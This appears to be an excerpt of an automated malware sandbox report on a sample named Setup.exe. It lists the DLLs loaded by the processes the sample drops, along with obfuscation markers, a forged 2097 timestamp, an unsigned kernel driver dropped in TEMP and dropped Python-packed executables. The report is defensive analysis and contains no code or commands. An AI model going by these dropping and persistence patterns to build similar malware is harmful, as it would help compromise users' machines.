Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: msvcp140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\fix.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Section loaded: python3.dll
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Section loaded: libffi-8.dll
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Users\user\Notepad.exe Section loaded: version.dll
Source: C:\Users\user\Notepad.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Notepad.exe Section loaded: python3.dll
Source: C:\Users\user\Notepad.exe Section loaded: libffi-8.dll
Source: C:\Users\user\Notepad.exe Section loaded: propsys.dll
Source: C:\Users\user\Notepad.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Notepad.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Notepad.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Notepad.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Notepad.exe Section loaded: amsi.dll
Source: C:\Users\user\Notepad.exe Section loaded: userenv.dll
Source: C:\Users\user\Notepad.exe Section loaded: profapi.dll
Source: C:\Users\user\Notepad.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe Section loaded: uxtheme.dll
Source: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe Section loaded: apphelp.dll
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Notepad.exe Section loaded: version.dll
Source: C:\Users\user\Notepad.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Notepad.exe Section loaded: python3.dll
Source: C:\Users\user\Notepad.exe Section loaded: libffi-8.dll
Source: C:\Users\user\Notepad.exe Section loaded: propsys.dll
Source: C:\Users\user\Notepad.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Notepad.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Notepad.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Notepad.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Notepad.exe Section loaded: amsi.dll
Source: C:\Users\user\Notepad.exe Section loaded: userenv.dll
Source: C:\Users\user\Notepad.exe Section loaded: profapi.dll
Source: C:\Users\user\Notepad.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Notepad.exe Section loaded: version.dll
Source: C:\Users\user\Notepad.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Notepad.exe Section loaded: python3.dll
Source: C:\Users\user\Notepad.exe Section loaded: libffi-8.dll
Source: C:\Users\user\Notepad.exe Section loaded: propsys.dll
Source: C:\Users\user\Notepad.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Notepad.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Notepad.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Notepad.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Notepad.exe Section loaded: amsi.dll
Source: C:\Users\user\Notepad.exe Section loaded: userenv.dll
Source: C:\Users\user\Notepad.exe Section loaded: profapi.dll
Source: C:\Users\user\Notepad.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanagersvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Setup.exe Static file information: File size 13096960 > 1048576
Source: Setup.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0xc7c800
Binary contains a suspicious time stamp
Source: fix.exe.0.dr Static PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]
PE file contains sections with non-standard names
Source: etc test.exe.0.dr Static PE information: section name: .00cfg
Source: hamburger.exe.0.dr Static PE information: section name: .00cfg
Source: Notepad.exe.0.dr Static PE information: section name: _RDATA
Source: tubpxzvwmyfr.exe.3.dr Static PE information: section name: .00cfg
Source: VCRUNTIME140.dll.6.dr Static PE information: section name: fothk
Source: VCRUNTIME140.dll.6.dr Static PE information: section name: _RDATA
Source: libcrypto-3.dll.6.dr Static PE information: section name: .00cfg
Source: python312.dll.6.dr Static PE information: section name: PyRuntim
Source: esfowblknspo.exe.8.dr Static PE information: section name: .00cfg
Source: Notepad.exe.13.dr Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll.18.dr Static PE information: section name: fothk
Source: VCRUNTIME140.dll.18.dr Static PE information: section name: _RDATA
Source: libcrypto-3.dll.18.dr Static PE information: section name: .00cfg
Source: python312.dll.18.dr Static PE information: section name: PyRuntim
Source: VCRUNTIME140.dll.47.dr Static PE information: section name: fothk
Source: VCRUNTIME140.dll.47.dr Static PE information: section name: _RDATA
Source: libcrypto-3.dll.47.dr Static PE information: section name: .00cfg
Source: python312.dll.47.dr Static PE information: section name: PyRuntim
Source: VCRUNTIME140.dll.56.dr Static PE information: section name: fothk
Source: VCRUNTIME140.dll.56.dr Static PE information: section name: _RDATA
Source: libcrypto-3.dll.56.dr Static PE information: section name: .00cfg
Source: python312.dll.56.dr Static PE information: section name: PyRuntim
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_03376F1A pushad ; ret 1_2_03376F23
Source: C:\Users\user\AppData\Local\Temp\hamburger.exe Code function: 3_2_00007FF7010C1394 push qword ptr [00007FF7010CA004h]; ret 3_2_00007FF7010C1403
Source: C:\Users\user\AppData\Local\Temp\etc test.exe Code function: 8_2_00007FF68CC61394 push qword ptr [00007FF68CC6B004h]; ret 8_2_00007FF68CC61403
Source: C:\Users\user\AppData\Local\Temp\fix.exe Code function: 10_2_06351810 push es; ret 10_2_06351820
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 13_2_00007FFE0C0AD3E8 push rbp; iretd 13_2_00007FFE0C0AD3ED
Source: C:\Users\user\Notepad.exe Code function: 19_2_00007FFE0C0AD3E8 push rbp; iretd 19_2_00007FFE0C0AD3ED
Source: C:\ProgramData\rstywrmdprzs\esfowblknspo.exe Code function: 38_2_00007FF7A81D1394 push qword ptr [00007FF7A81DB004h]; ret 38_2_00007FF7A81D1403
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe Code function: 43_2_00007FF7ECBC1394 push qword ptr [00007FF7ECBCA004h]; ret 43_2_00007FF7ECBC1403
Source: C:\Users\user\Notepad.exe Code function: 48_2_00007FFE1322D3E8 push rbp; iretd 48_2_00007FFE1322D3ED
Source: C:\Windows\System32\conhost.exe Code function: 52_2_0000000140001394 push qword ptr [0000000140009004h]; ret 52_2_0000000140001403
Source: C:\Users\user\Notepad.exe Code function: 57_2_00007FFE0EB2D3E8 push rbp; iretd 57_2_00007FFE0EB2D3ED

Persistence and Installation Behavior
barindex
Sample is not signed and drops a device driver
Source: C:\ProgramData\pehgyntafdrm\tubpxzvwmyfr.exe File created: C:\Windows\TEMP\trxhxvjzqipl.sys
Drops PE files
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\libffi-8.dll Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\libffi-8.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\select.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\_lzma.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\_decimal.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\_bz2.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\_hashlib.pyd Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI70442\_socket.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\_socket.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\select.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\libcrypto-3.dll Jump to dropped file
Source: C:\Users\user\Desktop\Setup.exe File created: C:\Users\user\AppData\Local\Temp\mergedALL.exe Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\_socket.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\VCRUNTIME140.dll Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI77162\_lzma.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI76522\_wmi.pyd Jump to dropped file
Source: C:\Users\user\Notepad.exe File created: C:\Users\user\AppData\Local\Temp\_MEI80002\_ctypes.pyd Jump to dropped file
